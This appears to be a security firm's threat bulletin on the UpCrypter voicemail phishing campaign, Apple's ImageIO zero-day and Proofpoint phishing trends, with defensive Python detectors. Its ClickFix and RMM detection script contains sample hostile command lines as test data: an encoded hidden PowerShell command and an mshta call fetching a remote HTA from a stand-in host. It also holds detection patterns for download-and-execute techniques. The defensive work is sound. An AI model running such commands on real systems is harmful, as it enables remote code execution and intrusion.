UpCrypter-Enabled Voicemail Scams Deliver RAT Payloads
In late August 2025, researchers at Fortinet FortiGuard Labs documented a phishing campaign delivering a malware loader known as UpCrypter. The campaign uses fake voicemail notifications and bogus purchase orders as lures to get recipients to download the loader.
The attack begins with phishing emails posing as missed-voicemail alerts or legitimate purchase-order messages. Each contains a link inviting the recipient to retrieve a PDF or audio file. The link leads to a landing page that fetches and displays the target organisation's real domain and logo, so the page looks like the victim's own branded portal. From there the user downloads a ZIP archive containing an obfuscated JavaScript file, UpCrypter's initial loader. Before doing anything else, the script checks for internet connectivity and looks for debugging tools, forensic utilities and sandbox environments, aborting on a positive match so that automated analysis never sees the later stages.
Once those checks pass, the JavaScript loader contacts an attacker-controlled server for the next stage. The payload arrives either as plain text or hidden inside an otherwise ordinary image file through steganography, so the download looks like an image fetch to anything inspecting the traffic.
The campaign also distributes UpCrypter as an MSIL (Microsoft Intermediate Language, i.e. .NET) loader with more thorough anti-analysis and anti-virtualisation checks. Once launched, it pulls down three components, a PowerShell script, a DLL and the final payload, and assembles them in memory at run time. When the chain completes, the loader installs one of several Remote Access Trojans (RATs), including PureHVNC, DCRat (DarkCrystal RAT) and Babylon RAT, each of which gives the attacker remote control of the infected machine.
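A first triage check for the steganographic delivery described above, written as an added example rather than code taken from the Fortinet report: many loaders that "hide" a stage in an image simply append it after the file's end-of-image marker, so parsing the PNG chunk list or the JPEG marker segments to the real end and reporting whatever follows catches that case offline. UpCrypter's exact embedding format is not described on this page and the check below is generic; the sample PNG and JPEG bytes are constructed here, and the base64 decode helper is an assumption about how such trailers are commonly encoded.

```python
import base64
import re
import struct
import zlib
from typing import Optional

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"


def png_end_offset(data: bytes) -> int:
    """Walk the chunk list and return the offset just past the IEND chunk."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunk_end = pos + 8 + length + 4          # header + data + CRC
        if chunk_end > len(data):
            raise ValueError("truncated chunk")
        if ctype == b"IEND":
            return chunk_end
        pos = chunk_end
    raise ValueError("no IEND chunk")


def jpeg_end_offset(data: bytes) -> int:
    """Walk marker segments up to SOS, then return the offset just past EOI.
    Length-prefixed segments (e.g. an APP1 EXIF thumbnail that carries its own
    SOI/EOI) are skipped by length, so only the genuine EOI is considered."""
    if not data.startswith(JPEG_SOI):
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                        # EOI before any scan data
            return pos + 2
        if marker == 0xFF:                        # fill byte
            pos += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD8:   # standalone markers (TEM, RSTn, SOI)
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment")
        (seg_len,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + seg_len
        if marker == 0xDA:                        # SOS: entropy-coded data follows.
            # Inside scan data an 0xFF byte is always stuffed (FF 00) or an RSTn
            # marker, so the first FF D9 after the scan header is the real EOI.
            eoi = data.find(JPEG_EOI, pos)
            if eoi < 0:
                raise ValueError("no EOI marker")
            return eoi + 2
    raise ValueError("no EOI marker")


def trailing_payload(data: bytes) -> bytes:
    """Bytes appended after the image's end marker; b"" for a clean file."""
    if data.startswith(PNG_SIGNATURE):
        end = png_end_offset(data)
    elif data.startswith(JPEG_SOI):
        end = jpeg_end_offset(data)
    else:
        raise ValueError("unsupported image type")
    return data[end:]


def decode_if_base64(trailer: bytes) -> Optional[bytes]:
    """Assumption: appended stages are often base64 text; return the decoded bytes if so."""
    text = trailer.strip()
    if not text or not re.fullmatch(rb"[A-Za-z0-9+/=\r\n]+", text):
        return None
    try:
        return base64.b64decode(text)
    except ValueError:
        return None


def _png_chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_sample_png() -> bytes:
    """Constructed 1x1 greyscale PNG used as offline input (not a campaign sample)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")             # filter byte + one pixel
    return PNG_SIGNATURE + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IDAT", idat) + _png_chunk(b"IEND", b"")


def build_sample_jpeg() -> bytes:
    """Constructed JPEG marker skeleton (not a decodable picture): SOI, APP0, SOS, scan data, EOI."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\xff\x00\x34\xff\xd0\x56"        # contains a stuffed FF 00 and an RST0 marker
    return JPEG_SOI + app0 + sos + scan + JPEG_EOI


if __name__ == "__main__":
    suspicious = build_sample_png() + b"TVqQAAMA"   # base64 of an MZ header, appended
    trailer = trailing_payload(suspicious)
    print(len(trailer), "trailing bytes; decoded head:", (decode_if_base64(trailer) or b"")[:2])
```

Run it against every image a loader pulled down (proxy cache, browser cache, or the staged file itself); a non-empty trailer whose decoded head is `MZ` or a PowerShell keyword is worth a ticket even before the rest of the chain is understood.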
Since early August 2025 the UpCrypter campaign has hit organisations in manufacturing, technology, construction, healthcare and hospitality, with victims reported in Austria, Belarus, Canada, Egypt, India and Pakistan, a broad geographic and sectoral reach.
In a separate campaign, Check Point recently exposed a large-scale phishing operation that abused Google Classroom infrastructure, sending more than 115,000 emails to 13,500 organisations between 6 and 12 August 2025. The emails carried fake commercial offers and steered victims to WhatsApp-based scam channels. Because the messages were generated and sent by Google's own infrastructure, they passed SPF, DKIM and DMARC rather than bypassing them: those checks confirm that Google sent the mail, which is true, and say nothing about the intent of whoever created the Classroom invitation. That is what got the messages past filters that treat a DMARC pass as a sign of legitimacy.
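To make the Google Classroom point concrete, here is an added example (not Check Point's or Google's code) that parses a message's Authentication-Results header and shows why a triple pass is not a trust signal: every pass is attributed to the platform's own domain, not to the organisation the display name claims to be. The raw message, the no-reply sender address and the example.net Reply-To are constructed for this example, and SHARED_PLATFORMS is an assumed list of platforms that send on behalf of arbitrary users.

```python
import email
import re
from email.policy import default
from email.utils import parseaddr
from typing import Dict, List

VERDICT_RE = re.compile(
    r"\b(spf|dkim|dmarc)=(pass|fail|none|neutral|softfail|temperror|permerror)\b", re.I
)
DKIM_DOMAIN_RE = re.compile(r"header\.d=([A-Za-z0-9.-]+)", re.I)

# Assumption: shared platforms whose infrastructure legitimately sends mail for any user.
SHARED_PLATFORMS = {"google.com", "classroom.google.com"}

# Constructed message (headers and addresses are not from a real sample).
SAMPLE_EMAIL = """\
From: "Acme Procurement" <no-reply@classroom.google.com>
Reply-To: acme-deals@example.net
To: buyer@example.com
Subject: Commercial offer - action required
Authentication-Results: mx.example.com;
 spf=pass smtp.mailfrom=classroom.google.com;
 dkim=pass header.d=google.com header.s=20230601;
 dmarc=pass header.from=classroom.google.com
Content-Type: text/plain

Please review the offer and continue the conversation on WhatsApp.
"""


def _domain(addr_header: str) -> str:
    """Domain part of the first address in a From/Reply-To style header."""
    return parseaddr(addr_header)[1].rpartition("@")[2].lower()


def auth_summary(raw: str) -> Dict[str, object]:
    """Collect SPF/DKIM/DMARC verdicts and the DKIM signing domains from all
    Authentication-Results headers, plus the sender identities a user sees."""
    msg = email.message_from_string(raw, policy=default)
    results: Dict[str, str] = {}
    dkim_domains: List[str] = []
    for hdr in msg.get_all("Authentication-Results", []):
        text = str(hdr)
        for mech, verdict in VERDICT_RE.findall(text):
            results[mech.lower()] = verdict.lower()
        dkim_domains += [d.lower() for d in DKIM_DOMAIN_RE.findall(text)]
    from_header = str(msg.get("From", ""))
    return {
        "results": results,
        "dkim_domains": dkim_domains,
        "display_name": parseaddr(from_header)[0],
        "from_domain": _domain(from_header),
        "reply_domain": _domain(str(msg.get("Reply-To", ""))),
    }


def assess(summary: Dict[str, object]) -> List[str]:
    """Findings that a fully authenticated message still deserves."""
    findings = []
    results = summary["results"]
    fully_authenticated = all(results.get(m) == "pass" for m in ("spf", "dkim", "dmarc"))
    identities = list(summary["dkim_domains"]) + [summary["from_domain"]]
    if fully_authenticated and any(d in SHARED_PLATFORMS for d in identities):
        findings.append(
            "authenticated by a shared platform, not by the organisation named in the display name"
        )
    if summary["reply_domain"] and summary["reply_domain"] != summary["from_domain"]:
        findings.append("Reply-To domain differs from From domain")
    return findings


if __name__ == "__main__":
    summary = auth_summary(SAMPLE_EMAIL)
    print(summary["results"], summary["dkim_domains"])
    for finding in assess(summary):
        print("-", finding)
```

The useful output is not the verdicts but the identities they vouch for: `dkim=pass header.d=google.com` tells you Google signed the message, and nothing about "Acme Procurement". Filters that key on the signing domain and on Reply-To drift catch this class of abuse where a plain DMARC check cannot.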
The UpCrypter campaign shows how evasive phishing has become. By combining authentic-looking lures, impersonation built from the target's own domain and logo, multi-stage payload delivery and in-memory execution, the operators achieve high success rates while leaving little forensic evidence on disk.
References:
Phishing Campaign Uses UpCrypter in Fake Voicemail Emails to Deliver RAT Payloads
Phishing Campaign Targeting Companies via UpCrypter | FortiGuard Labs

Apple ImageIO Zero-Day: A Picture-Perfect Exploit
Threat Level: Critical
Impact: Remote code execution, device compromise, espionage potential
Platforms: iOS, iPadOS, macOS
First reported: August 2025
Sources: Apple Security Updates
A Picture Worth a Thousand Exploits
Apple’s carefully cultivated security image has taken another hit. The company has issued emergency updates for CVE-2025-43300, a flaw in the ImageIO framework that lets attackers weaponise an apparently harmless image file. If a vulnerable device processes such a file, whether because the user opens it, previews it, or the OS parses it to build a thumbnail, the attacker can achieve remote code execution.
Apple acknowledged that the flaw may already have been exploited in what it called an extremely sophisticated attack against specific targeted individuals. That phrasing usually signals a well-resourced adversary using the bug in narrowly targeted operations rather than mass spam runs: surveillance, corporate espionage, or government-grade spyware.
Technical Aspects
At its core, CVE-2025-43300 is an out-of-bounds write in ImageIO, Apple’s ubiquitous image-parsing framework, which Apple fixed with improved bounds checking. A maliciously crafted image file drives the parser into writing past the buffer it allocated, corrupting adjacent memory; that corruption is the foothold from which an attacker builds code execution.
Because ImageIO isn’t confined to one app, the attack surface is huge. The framework renders images for iMessage, Safari, Mail, and countless third-party apps. No sideloading is needed, and in delivery paths where the OS parses the image automatically, for example to generate a thumbnail or preview, no user interaction is needed either.
Once successful, the exploit gives attackers arbitrary code execution with the privileges of the process that parsed the image. From there they can deploy spyware, lift credentials, or chain further exploits for deeper persistence. Apple kept the technical detail sparse, but the report of in-the-wild exploitation means the bug has already been turned into a reliable weapon.
Current Threat Landscape
This isn’t Apple’s first scramble this year. Several WebKit and kernel zero-days have already been patched, and the pattern is clear: attackers are deliberately targeting low-interaction vectors like images, fonts, and web content. They know these are the daily “background” functions that users rarely think about but that every device processes constantly.
Zero-click or near-zero-click exploits are prized in the surveillance market. They’re quiet, effective, and hard for victims to detect. High-value targets — executives, journalists, diplomats, or engineers working on sensitive projects — are the most likely recipients. And once compromised, a single personal iPhone or Mac can open doors to corporate accounts, VPNs, and sensitive communications.
Business Impact
The risks here aren’t confined to personal devices. Employees increasingly use iPhones, iPads, and Macs for corporate email, authentication apps, and remote access. A single compromised handset can quickly escalate into business compromise, exposing cloud accounts, sensitive data, or even administrative access. Because this zero-day is already being exploited, the threat is operational, not hypothetical. Beyond technical damage, there’s a reputational and legal dimension — few things damage trust faster than customer or partner data leaking through a compromised executive’s phone.
Defensive Requirements
The immediate step is simple: patch everything now. Deploy iOS 18.6.2, iPadOS 18.6.2 (or iPadOS 17.7.10 on older iPads that cannot run 18), and macOS Ventura 13.7.8 / Sonoma 14.7.8 / Sequoia 15.6.1 across managed fleets, and enforce patch compliance on BYOD.
Beyond that:
- Awareness: Drive home that malicious content isn’t always an attachment or link. Even an image can be toxic.
- MDM enforcement: Ensure updates are applied and old OS versions are barred from corporate access.
- Segmentation: Treat mobile and personal devices as less trusted by default, limiting direct access into sensitive internal systems.
- Monitoring: Hunt for unusual logins from Apple devices, and keep hunting after the patch ships: once a fix is public, attackers often rush to exploit the devices that have not yet installed it.
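A fleet check for the patch requirement above, as an added example that is not Apple's or any MDM vendor's code: it compares OS versions exported from an MDM with the minimum fixed builds Apple published for CVE-2025-43300 and explains each non-compliant device. The inventory is constructed; treating OS generations newer than the advisory as patched, and treating unlisted older generations as having no fix, are assumptions to adjust for your own fleet.

```python
import re
from typing import Dict, List, Tuple

# Earliest builds containing the fix for CVE-2025-43300, per Apple's August 2025
# security release notes, keyed by (platform, major version).
MIN_PATCHED: Dict[Tuple[str, int], Tuple[int, ...]] = {
    ("ios", 18): (18, 6, 2),
    ("ipados", 18): (18, 6, 2),
    ("ipados", 17): (17, 7, 10),   # older iPads that cannot run iPadOS 18
    ("macos", 15): (15, 6, 1),     # Sequoia
    ("macos", 14): (14, 7, 8),     # Sonoma
    ("macos", 13): (13, 7, 8),     # Ventura
}

# Constructed MDM export; device names and versions are illustrative only.
SAMPLE_INVENTORY = [
    {"device": "iphone-ceo", "platform": "iOS", "version": "18.6.2"},
    {"device": "iphone-fin-01", "platform": "iOS", "version": "18.6.1"},
    {"device": "ipad-lobby", "platform": "iPadOS", "version": "17.7.9"},
    {"device": "mbp-dev-07", "platform": "macOS", "version": "14.7.8 (23H626)"},
    {"device": "imac-legacy", "platform": "macOS", "version": "12.7.6"},
    {"device": "mbp-eng-02", "platform": "macOS", "version": "15.7"},
]


def parse_version(text: str) -> Tuple[int, ...]:
    """Leading dotted numeric version, padded to at least three components;
    a trailing build identifier such as '(23H626)' is ignored."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    parts = tuple(int(p) for p in m.group(1).split("."))
    return parts + (0,) * (3 - len(parts))


def is_patched(platform: str, version: str) -> Tuple[bool, str]:
    """(patched?, reason) for one device."""
    plat = platform.lower()
    ver = parse_version(version)
    known_majors = sorted(m for (p, m) in MIN_PATCHED if p == plat)
    if not known_majors:
        raise ValueError(f"unknown platform: {platform!r}")
    if ver[0] > known_majors[-1]:
        # Assumption: releases newer than the advisory's generations include the fix.
        return True, "newer OS generation than the advisory covers; treated as patched"
    floor = MIN_PATCHED.get((plat, ver[0]))
    if floor is None:
        # Assumption: no fixed build was published for this generation.
        return False, "no fixed build for this OS generation; upgrade to a supported major version"
    if ver >= floor:
        return True, "patched"
    return False, "below minimum fixed build " + ".".join(map(str, floor))


def compliance_report(inventory: List[dict]) -> Dict[str, List[dict]]:
    """Split an inventory into compliant and non-compliant devices with reasons."""
    report: Dict[str, List[dict]] = {"compliant": [], "noncompliant": []}
    for dev in inventory:
        ok, reason = is_patched(dev["platform"], dev["version"])
        report["compliant" if ok else "noncompliant"].append({**dev, "reason": reason})
    return report


if __name__ == "__main__":
    for dev in compliance_report(SAMPLE_INVENTORY)["noncompliant"]:
        print(f"{dev['device']:14} {dev['platform']:7} {dev['version']:16} {dev['reason']}")
```

Feed the non-compliant list straight into the MDM policy that blocks access (the "MDM enforcement" item above): the reason field distinguishes a device that merely needs an update from one that has run out of fixes and must be replaced or moved to a newer major version.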
Bottom Line
A single image shouldn’t be enough to compromise a modern device – but in 2025, that’s where we are. CVE-2025-43300 is a reminder that Apple’s walled garden is far from impenetrable. For defenders, the message is blunt: patch fast, monitor mobile endpoints, and don’t assume a polished Apple logo equals safety. The attackers are already inside the frame.
References:
Apple fixes new zero-day flaw exploited in targeted attacks
Apple security releases – Apple Support

Phishing 2025: Weaponising Human Behaviour
Threat Level: High
Impact: Credential theft, account takeover, ransomware staging
Platforms: Email, SMS, collaboration apps, SaaS platforms
Source: Proofpoint Human Factor Vol. 2 (2025)
A Click Away from Compromise
Phishing has never been this insidious. Proofpoint’s Human Factor 2025: Phishing and URL-Based Threats report makes one thing clear: the era of attachments as the main delivery vector is over. Today, malicious URLs dominate – blending technical trickery with psychological manipulation to devastating effect.
Report Highlights
- URLs now outnumber attachments 4:1 in phishing campaigns.
- Proofpoint recorded 3.7 billion URL-based threats in six months, with credential theft dominating.
- ClickFix campaigns surged nearly 400%, using fake CAPTCHAs and prompts to trick users into running code.
- Around 34% of URL campaigns deployed Remote Monitoring & Management (RMM) tools, abused for persistence and lateral movement.
- Smishing threats exploded — a 2,534% increase in SMS-delivered URLs, often tied to fake tolls or delivery scams.
- QR code phishing is now mainstream, with 4.2 million threats detected in early 2025.
Off-the-shelf phish kits like CoGUI and Darcula are fuelling the rise, enabling even low-skilled actors to run professional-grade phishing operations that bypass MFA and target victims by region.
Current Threat Landscape
Attackers are spreading out across every platform where links can be shared: Teams chats, LinkedIn messages, PDFs, and QR codes. Many look indistinguishable from legitimate services, making them harder for both users and filters to catch.
The endgame is often broader than one quick hit. Credentials fuel follow-on attacks, RMM tools provide stealthy persistence, and the groundwork is laid for ransomware or fraud. In this model, people themselves – not systems – are the primary entry point.
Business Impact
The fallout from these campaigns can be wide-ranging. A stolen password might trigger account takeover, leading to data theft, financial fraud, or ransomware. RMM abuse makes intrusions harder to evict and increases downtime when attackers strike. The rapid rise of smishing and QR threats creates new pathways for criminals to reach staff and customers directly. Financial loss is the obvious outcome, but reputational damage is just as serious when compromised accounts are used to target partners or suppliers, eroding trust at exactly the wrong time.
Defensive Requirements
Defending against this wave of phishing demands a layered approach. Start with multi-channel filtering: URLs need to be analysed whether they arrive by email, SMS, or chat. Add click-time protection that re-evaluates a link at the moment it is clicked, because a URL that was clean when the message was delivered can be armed afterwards.
On endpoints, watch for signs of persistence such as unauthorised RMM installs, suspicious registry edits, or rogue system services. Training is still vital but make it specific: employees should recognise fake delivery notices, road toll scams, and QR codes that appear out of context.
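An added detection example that covers both the ClickFix statistic above and the advice to watch endpoints for unauthorised RMM installs; it is not Proofpoint's detection logic. It runs two rules over simplified process-creation records: a script host started by explorer.exe with an encoded, hidden-window or URL-fetching command line (what a command pasted into the Run dialog looks like), and an RMM agent binary that is not on the organisation's allowlist. The event lines, the hostname in the URL and the allowlist containing only TeamViewer are constructed assumptions.

```python
import re
from typing import Dict, List

# Constructed, simplified Sysmon Event ID 1 records (not real telemetry).
SAMPLE_EVENTS = r"""
EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine="powershell -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
EventID=1 Image=C:\Windows\System32\mshta.exe ParentImage=C:\Windows\explorer.exe CommandLine="mshta https://captcha-verify.example/v.hta"
EventID=1 Image=C:\Users\jdoe\AppData\Local\Temp\AnyDesk.exe ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="AnyDesk.exe --install C:\Users\jdoe\AppData\Roaming\AnyDesk --silent"
EventID=1 Image="C:\Program Files\TeamViewer\TeamViewer.exe" ParentImage=C:\Windows\System32\services.exe CommandLine="TeamViewer.exe -service"
EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe CommandLine="powershell Get-Date"
"""

# Hosts a victim is told to paste a command into after Win+R; explorer.exe is then the parent.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe", "curl.exe"}
CLICKFIX_RE = re.compile(
    r"(?i)(-e(nc(odedcommand)?)?\s|-w(indowstyle)?\s+hidden|invoke-expression|\biex\b|"
    r"downloadstring|frombase64string|https?://)"
)
# RMM agents frequently abused for hands-on-keyboard access (lower-cased image basenames).
RMM_BINARIES = {"anydesk.exe", "teamviewer.exe", "screenconnect.clientservice.exe",
                "ateraagent.exe", "client32.exe", "rustdesk.exe", "ltsvc.exe"}
APPROVED_RMM = {"teamviewer.exe"}   # assumption: the only tool this fleet sanctions

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """key=value and key="quoted value" pairs into a dict."""
    return {key: quoted or bare for key, quoted, bare in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events_text: str) -> List[Dict[str, str]]:
    """Apply the ClickFix and unapproved-RMM rules to every process-creation record."""
    alerts: List[Dict[str, str]] = []
    for line in events_text.strip().splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "1":
            continue
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if parent == "explorer.exe" and image in SCRIPT_HOSTS and CLICKFIX_RE.search(cmd):
            alerts.append({"rule": "clickfix-exec", "image": image, "evidence": cmd})
        if image in RMM_BINARIES and image not in APPROVED_RMM:
            alerts.append({"rule": "unapproved-rmm", "image": image, "evidence": ev.get("Image", "")})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['image']}: {alert['evidence']}")
```

The two rules are deliberately independent: the third record fires only the RMM rule even though PowerShell launched the installer, and the last record (an ordinary command from the Run dialog) fires nothing. Tune SCRIPT_HOSTS and the allowlist to the fleet, and treat an RMM install from a user-writable path such as AppData as a higher-severity variant of the same alert.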
Focus protection where it matters most. Executives, finance teams, and admins – Proofpoint’s “Very Attacked People” – face disproportionate targeting. Give them stronger authentication and closer monitoring so one bad click doesn’t escalate into a crisis.
Bottom Line
This isn’t phishing as we used to know it. Today’s lures are AI-polished, brand-faithful, and designed to slip past both filters and human suspicion. Proofpoint’s data makes it clear: URL-based phishing is the frontline threat in 2025.
If your defences stop at the inbox, you’re already a step behind. The attack surface now spans SMS, collaboration tools, and every platform where someone can be tricked into clicking. Build your defences for that reality – because one careless scan or tap is all it takes to open the door.
References:
The Human Factor 2025 Vol. 2: URL Phishing | Proofpoint US
Norm tracks and monitors the latest security trends and cyber threats and collates these into a fortnightly threat bulletin.



